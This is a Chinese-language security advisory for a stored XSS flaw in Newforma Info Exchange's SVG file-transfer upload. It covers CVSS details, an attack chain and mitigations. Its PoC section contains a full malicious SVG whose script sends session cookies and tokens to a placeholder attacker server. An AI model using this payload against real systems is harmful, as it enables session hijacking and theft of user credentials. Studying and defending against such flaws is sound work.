CVE-2025-35060 Newforma Info Exchange SVG文件上传存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-35060

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Newforma Info Exchange (NIX)

漏洞概述

CVE-2025-35060是Newforma Info Exchange（NIX）产品中'Send a File Transfer'（发送文件传输）功能存在的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞允许远程经过身份验证的攻击者上传包含恶意JavaScript代码或其他可执行内容的SVG（可缩放矢量图形）文件。当目标用户（特别是使用移动端用户代理的受害者）通过Web浏览器查看或访问这些上传的SVG文件时，浏览器会解析并执行其中嵌入的恶意脚本，从而实现对受害者会话的劫持、敏感信息窃取或其他恶意操作。

该漏洞的CVSS 3.1评分为5.5分，属于中危级别。攻击者需要拥有有效的低权限账户才能利用此漏洞，且需要受害者用户进行交互（如查看上传的文件）。尽管利用条件相对受限，但由于该漏洞影响的是企业级文件交换平台的核心功能，潜在危害范围可能涉及大量企业用户。该漏洞已于2025年10月9日公开披露，由相关安全研究机构提交至CISA进行管理。此漏洞的存在表明Newforma Info Exchange在文件上传安全验证机制方面存在缺陷，未能对SVG文件中的脚本内容进行有效的过滤和清理。

技术细节

该漏洞的核心技术原理在于SVG文件的特殊性质。SVG（Scalable Vector Graphics）是一种基于XML的矢量图形格式，与常见的图片格式（如PNG、JPG）不同，SVG文件本质上是一个XML文档，可以包含JavaScript代码、HTML元素以及外部资源引用等可执行内容。当Web浏览器渲染SVG文件时，会执行其中嵌入的脚本代码，这与HTML页面中的脚本执行行为类似。

在Newforma Info Exchange的'Send a File Transfer'功能中，系统允许用户上传各种类型的文件，但未对SVG文件进行安全验证或内容过滤。攻击者利用这一缺陷，可以构造一个包含恶意JavaScript代码的SVG文件，例如：

1. 创建一个有效的SVG文件，在其中嵌入`<script>`标签，包含恶意JavaScript代码；
2. 利用合法的低权限账户登录系统；
3. 通过'Send a File Transfer'功能将该恶意SVG文件上传到平台；
4. 将该文件发送给目标用户或放置在受害者可访问的位置；
5. 当受害者（特别是使用移动设备浏览器的用户）通过浏览器查看该SVG文件时，嵌入的恶意脚本将被执行。

执行后的恶意脚本可以执行多种攻击操作，包括但不限于：窃取用户的会话Cookie和身份验证令牌、执行未授权的操作、修改页面内容、进行钓鱼攻击、窃取敏感信息或利用浏览器漏洞进行进一步的攻击。由于该漏洞属于存储型XSS，恶意载荷会持久存储在服务器端，每次受害者访问受感染的文件时都会触发攻击。

攻击链分析

STEP 1

步骤1：获取合法凭证

攻击者通过合法渠道或社会工程学手段获取Newforma Info Exchange的低权限账户凭证。

STEP 2

步骤2：构造恶意SVG文件

攻击者创建一个包含恶意JavaScript代码的SVG文件，利用SVG格式支持脚本执行的特性，将XSS载荷嵌入文件中。

STEP 3

步骤3：上传恶意文件

攻击者登录系统后，利用'Send a File Transfer'功能将恶意SVG文件上传至平台。由于系统未对SVG内容进行安全检查，文件被成功存储。

STEP 4

步骤4：诱导受害者访问

攻击者通过平台内部消息系统将该文件发送给目标用户，或将其放置在受害者可能访问的共享位置。

STEP 5

步骤5：触发XSS执行

受害者（特别是使用移动端浏览器的用户）通过浏览器查看该SVG文件时，嵌入的恶意JavaScript代码被执行。

STEP 6

步骤6：数据窃取与进一步攻击

恶意脚本执行后，窃取用户的会话Cookie、身份验证令牌等敏感信息，并将其发送到攻击者控制的服务器，攻击者可利用这些信息进行会话劫持或其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-35060 PoC - Malicious SVG file for Stored XSS in Newforma Info Exchange -->
<!-- This SVG file contains embedded JavaScript that executes when rendered by a web browser -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <rect width="200" height="200" fill="lightblue"/>
    <text x="50" y="100" font-family="Arial" font-size="16">Innocent looking SVG</text>
    <!-- Malicious JavaScript payload -->
    <script type="text/javascript">
        //<![CDATA[
        // Steal session cookies and send to attacker's server
        var cookie = document.cookie;
        var sessionToken = document.querySelector('meta[name="csrf-token"]')?.content || '';
        var userAgent = navigator.userAgent;
        
        // Exfiltrate data to attacker-controlled server
        var img = new Image();
        img.src = 'https://attacker.example.com/collect?cookie=' + encodeURIComponent(cookie) + 
                  '&token=' + encodeURIComponent(sessionToken) + 
                  '&ua=' + encodeURIComponent(userAgent);
        
        // Additional malicious actions can be performed here
        // For example: redirect to phishing page, modify DOM, etc.
        alert('XSS Triggered via CVE-2025-35060 - Cookie: ' + cookie);
        //]]>
    </script>
</svg>

影响范围

Newforma Info Exchange (NIX) - 所有未修复的受影响版本

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）限制或暂停'Send a File Transfer'功能中对SVG文件的接收；2）在Web代理或反向代理层面配置规则，阻止或过滤包含`<script>`标签的SVG文件；3）部署内容安全策略（CSP），限制页面中可执行的脚本来源；4）加强用户安全意识培训，提醒用户不要随意打开来源不明的SVG文件；5）监控异常的文件上传行为和可疑的网络请求；6）对于必须使用SVG文件的场景，考虑使用专门的SVG清理工具对文件进行预处理，移除其中的脚本内容。